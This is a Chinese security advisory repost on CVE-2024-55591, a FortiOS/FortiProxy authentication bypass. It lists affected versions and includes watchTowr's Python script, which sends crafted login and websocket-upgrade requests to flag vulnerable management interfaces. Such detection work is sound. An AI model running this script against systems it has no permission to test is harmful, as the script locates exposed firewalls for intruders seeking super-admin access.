0x00 前言
FortiOS是美国飞塔(Fortinet)公司开发的一套专用于FortiGate网络安全平台上的安全操作系统,FortiOS本身就具有多种功能,防火墙、IPSec VPN、SSL-VPN、IPS、防病毒、Web过滤、反垃圾邮件和应用控制(即时通讯和P2P),以及带宽控制。
0x01 漏洞描述
未经身份验证的远程攻击者可以通过向 Node.js websocket 模块发送特制请求,成功利用此漏洞可使攻击者获得超级管理员权限。
0x02 CVE编号
CVE-2024-55591
0x03 影响版本
7.0.0 <= FortiOS 7.0.* <= 7.0.16
7.0.0 <= FortiProxy 7.0.* <= 7.0.19
7.2.0 <= FortiProxy 7.2.* <= 7.2.12
0x04 漏洞详情
POC:
https://github.com/watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591
import requests
import random
from uuid import uuid4
from datetime import datetime, timedelta
import argparse
banner = """
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \\| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \\___| Y | |( <_> \ / | | \n \/\_/ (____ |__| \\\___ |___|__|__ | \\__ / \/\_/ |__|
\ \ \
CVE-2024-55591.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) vulnerable detection by watchTowr
- Sonny , watchTowr ([email protected])
- Aliz Hammond, watchTowr ([email protected])
CVEs: [CVE-2024-55591]
"""
def generate_random_suffix(length=6):
"""Generate a random lowercase suffix."""
return''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(length))
def perform_web_interaction(target, port):
"""
Perform a two-step web interaction with specific parameters.
Args:
target (str): Target IP address
port (int): Target port
Returns:
tuple: Results of the two requests
"""
# Construct base URL
base_url = f"https://{target}:{port}"
# Generate random suffix
random_suffix = generate_random_suffix()
# Disable SSL verification warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# First request - login-like endpoint
first_url = f"{base_url}/login?redir=/ng"
first_response = requests.get(first_url, verify=False, timeout=10)
# Second request - endpoint with random suffix
second_url = f"{base_url}/watchTowr-{random_suffix}"
second_headers = {
'Sec-WebSocket-Version': '13',
'Sec-WebSocket-Key': 'thFz/fKwzu5wDEy0XO3fcw==',
'Connection': 'keep-alive, Upgrade',
'Upgrade': 'websocket'
}
second_response = requests.get(second_url, headers=second_headers, verify=False, timeout=10)
return first_response, second_response
def validate_interaction_conditions(first_response, second_response):
"""
Validate specific conditions for the web interaction.
Args:
first_response (requests.Response): First HTTP response
second_response (requests.Response): Second HTTP response
Returns:
bool: Whether all conditions are met
"""
try:
# Check status codes
status_code_1_check = first_response.status_code == 200
status_code_2_check = second_response.status_code == 101
# Check body contents for first response
html_main_app_check = '<html class="main-app">' in first_response.text
f_icon_warning_check = '<f-icon class="fa-warning' in first_response.text
f_icon_closing_check = '</f-icon>' in first_response.text
body_checks = html_main_app_check and f_icon_warning_check and f_icon_closing_check
# Check for specific header marker
header_marker_check = any('APSCOOKIE_' in str(header) for header in first_response.headers.values())
# Check connection upgrade for second response
connection_upgrade_check = 'Upgrade' in second_response.headers.get('Connection', '')
# Print detailed information about first response matchers
if not html_main_app_check:
print("[!] Target is not a FortiOS Management Interface")
exit()
if not f_icon_warning_check:
print("[!] '<f-icon class="fa-warning"' not found in response")
# Combine all checks
return all([
status_code_1_check,
status_code_2_check,
body_checks,
header_marker_check,
connection_upgrade_check
])
except Exception as e:
print(f"[!] Error during validation: {e}")
return False
def main():
"""
Main function to run the web interaction checks.
"""
print(banner)
parser = argparse.ArgumentParser(description='CVE-2024-55591 Detection Tool')
parser.add_argument('--target', '-t', type=str, help='IP address of the target', required=True)
parser.add_argument('--port', '-p', type=int, help='Port of the target', required=False, default=443)
args = parser.parse_args()
try:
print(f"[*] Targeting: https://{args.target}:{args.port}")
first_response, second_response = perform_web_interaction(args.target, args.port)
result = validate_interaction_conditions(first_response, second_response)
if result:
print("[!] VULNERABLE: All conditions were met")
else:
print("[*] NOT VULNERABLE: Conditions were not satisfied")
except requests.RequestException as e:
print(f"[!] Request error: {e}")
except Exception as e:
print(f"[!] Unexpected error: {e}")
if __name__ == "__main__":
main()
0x05 参考链接
https://fortiguard.fortinet.com/psirt/FG-IR-24-535
原文始发于微信公众号(信安百科):CVE-2024-55591|FortiOS和FortiProxy身份认证绕过漏洞(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论